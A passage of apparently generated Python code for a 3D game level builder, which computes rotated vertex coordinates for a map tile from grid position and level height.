x13 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[0])
y13 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512), 90)[1])
z13 = level*448 + 64
x14 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y14 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z14 = level*448 + 64
x15 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y15 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z15 = level*448 + 0
x16 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[0])
y16 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[1])
z16 = level*448 + 0
x17 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[0])
y17 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[1])
z17 = level*448 + 0
x18 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[0])
y18 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-512)), 90)[1])
z18 = level*448 + 64
x19 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[0])
y19 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[1])
z19 = level*448 + 64
x20 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[0])
y20 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[1])
z20 = level*448 + 64
x21 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[0])
y21 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[1])
z21 = level*448 + 309
x22 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[0])
y22 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[1])
z22 = level*448 + 64
x23 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[0])
y23 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[1])
z23 = level*448 + 64
x24 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[0])
y24 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[1])
z24 = level*448 + 309
x25 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[0])
y25 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[1])
z25 = level*448 + 309
x26 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[0])
y26 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[1])
z26 = level*448 + 309
x27 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[0])
y27 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[1])
z27 = level*448 + 309
x28 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[0])
y28 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[1])
z28 = level*448 + 64
x29 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[0])
y29 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[1])
z29 = level*448 + 64
x30 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[0])
y30 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[1])
z30 = level*448 + 64
x31 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[0])
y31 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[1])
z31 = level*448 + 64
x32 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[0])
y32 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[1])
z32 = level*448 + 64
x33 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[0])
y33 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (458), posy*-1*512 + (-512)), 90)[1])
z33 = level*448 + 309
x34 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[0])
y34 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[1])
z34 = level*448 + 309
x35 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[0])
y35 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-458)), 90)[1])
z35 = level*448 + 64
x36 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[0])
y36 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (512), posy*-1*512 + (-512)), 90)[1])
z36 = level*448 + 64
x37 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[0])
y37 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[1])
z37 = level*448 + 309
x38 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[0])
y38 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (293), posy*-1*512 + (-346)), 90)[1])
z38 = level*448 + 64
x39 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[0])
y39 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (346), posy*-1*512 + (-293)), 90)[1])
z39 = level*448 + 64
x40 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 90)[0])
y40 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 90)[1])
z40 = level*448 + 64
x41 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[0])
y41 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[1])
z41 = level*448 + 64
x42 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[0])
y42 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[1])
z42 = level*448 + 320
x43 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[0])
y43 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[1])
z43 = level*448 + 64
x44 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[0])
y44 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[1])
z44 = level*448 + 64
x45 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[0])
y45 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[1])
z45 = level*448 + 320
x46 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[0])
y46 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[1])
z46 = level*448 + 320
x47 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[0])
y47 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[1])
z47 = level*448 + 320
x48 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 90)[0])
y48 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 90)[1])
z48 = level*448 + 320
x49 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[0])
y49 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[1])
z49 = level*448 + 64
x50 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[0])
y50 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[1])
z50 = level*448 + 64
x51 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[0])
y51 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[1])
z51 = level*448 + 64
x52 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[0])
y52 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[1])
z52 = level*448 + 320
x53 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[0])
y53 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (160), posy*-1*512 + (-230)), 90)[1])
z53 = level*448 + 64
x54 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 90)[0])
y54 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (228), posy*-1*512 + (-160)), 90)[1])
z54 = level*448 + 64
x55 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[0])
y55 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[1])
z55 = level*448 + 320
x56 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[0])
y56 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (352), posy*-1*512 + (-286)), 90)[1])
z56 = level*448 + 64
x57 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[0])
y57 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (283), posy*-1*512 + (-356)), 90)[1])
z57 = level*448 + 64
x58 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y58 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z58 = level*448 + 309
x59 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y59 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z59 = level*448 + 64
x60 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[0])
y60 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[1])
z60 = level*448 + 64
x61 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 90)[0])
y61 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 90)[1])
z61 = level*448 + 64
x62 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y62 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z62 = level*448 + 64
x63 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y63 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z63 = level*448 + 309
x64 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y64 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z64 = level*448 + 309
x65 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y65 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z65 = level*448 + 64
x66 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y66 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z66 = level*448 + 64
x67 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 90)[0])
y67 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 90)[1])
z67 = level*448 + 309
x68 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y68 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z68 = level*448 + 309
x69 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y69 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z69 = level*448 + 309
x70 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[0])
y70 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[1])
z70 = level*448 + 64
x71 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y71 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z71 = level*448 + 64
x72 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y72 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z72 = level*448 + 64
x73 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[0])
y73 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[1])
z73 = level*448 + 309
x74 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[0])
y74 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (250), posy*-1*512 + (-197)), 90)[1])
z74 = level*448 + 64
x75 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 90)[0])
y75 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (197), posy*-1*512 + (-250)), 90)[1])
z75 = level*448 + 64
x76 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y76 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z76 = level*448 + 309
x77 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y77 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z77 = level*448 + 64
x78 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y78 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z78 = level*448 + 64
x79 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[0])
y79 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[1])
z79 = level*448 + 64
x80 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y80 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z80 = level*448 + 64
x81 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y81 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z81 = level*448 + 309
x82 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y82 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z82 = level*448 + 309
x83 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y83 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z83 = level*448 + 309
x84 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[0])
y84 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[1])
z84 = level*448 + 309
x85 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y85 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z85 = level*448 + 64
x86 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[0])
y86 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-245)), 90)[1])
z86 = level*448 + 64
x87 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[0])
y87 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[1])
z87 = level*448 + 64
x88 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y88 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z88 = level*448 + 309
x89 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y89 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z89 = level*448 + 64
x90 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[0])
y90 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[1])
z90 = level*448 + 64
x91 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y91 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z91 = level*448 + 64
x92 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y92 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z92 = level*448 + 64
x93 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y93 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z93 = level*448 + 309
x94 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y94 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z94 = level*448 + 309
x95 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y95 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z95 = level*448 + 64
x96 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y96 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z96 = level*448 + 64
x97 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y97 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z97 = level*448 + 309
x98 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y98 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z98 = level*448 + 64
x99 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[0])
y99 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[1])
z99 = level*448 + 64
x100 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[0])
y100 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[1])
z100 = level*448 + 309
x101 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[0])
y101 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-192)), 90)[1])
z101 = level*448 + 64
x102 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y102 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z102 = level*448 + 64
x103 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[0])
y103 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (138), posy*-1*512 + (-192)), 90)[1])
z103 = level*448 + 309
x104 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y104 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z104 = level*448 + 309
x105 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y105 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z105 = level*448 + 309
x106 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[0])
y106 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (192), posy*-1*512 + (-138)), 90)[1])
z106 = level*448 + 64
x107 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y107 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z107 = level*448 + 64
x108 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y108 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z108 = level*448 + 64
x109 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y109 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z109 = level*448 + 309
x110 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y110 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z110 = level*448 + 64
x111 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y111 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z111 = level*448 + 64
x112 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 90)[0])
y112 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (53), posy*-1*512), 90)[1])
z112 = level*448 + 64
x113 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y113 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z113 = level*448 + 64
x114 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[0])
y114 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-74)), 90)[1])
z114 = level*448 + 309
x115 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y115 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z115 = level*448 + 64
x116 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[0])
y116 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[1])
z116 = level*448 + 64
x117 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[0])
y117 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[1])
z117 = level*448 + 309
x118 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[0])
y118 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[1])
z118 = level*448 + 309
x119 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[0])
y119 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[1])
z119 = level*448 + 64
x120 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[0])
y120 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512), 90)[1])
z120 = level*448 + 64
x121 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[0])
y121 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512 + (128), posy*-1*512 + (-181)), 90)[1])
z121 = level*448 + 309
x122 = int(rotatePoint((posx*512+256,posy*-1*512-256), (posx*1*512, posy*-1*512 + (-53)), 90)[0])
